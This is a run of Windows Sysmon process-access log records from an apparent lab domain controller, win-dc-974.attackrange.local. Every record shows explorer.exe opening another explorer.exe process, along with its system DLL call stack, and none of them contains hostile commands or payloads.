16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 